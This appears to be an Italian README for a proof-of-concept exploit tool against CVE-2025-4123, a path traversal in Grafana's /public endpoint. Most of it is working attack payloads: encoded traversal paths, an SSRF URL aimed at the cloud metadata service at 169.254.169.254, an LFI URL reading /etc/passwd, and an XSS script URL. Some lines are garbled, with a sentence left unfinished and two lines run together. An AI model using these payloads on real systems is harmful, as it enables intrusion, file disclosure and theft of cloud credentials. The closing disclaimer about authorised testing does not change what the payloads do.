
CVE-2025-4123 - Strumento Grafana
Sviluppato da mitsec
Questo è uno strumento exploit proof-of-concept (PoC) per CVE-2025-4123, una vulnerabilità critica di path traversal nell'endpoint /public di Grafana. L'exploit consente di eseguire:
Istanze di Grafana con endpoint /public/ che gestiscono in modo improprio percorsi codificati come:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
Quindi seleziona la modalità desiderata:
169.254.169.254/etc/passwd[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
Questo codice è fornito esclusivamente a scopo educativo e per test autorizzati. L'uso non autorizzato contro sistemi senza consenso è illegale.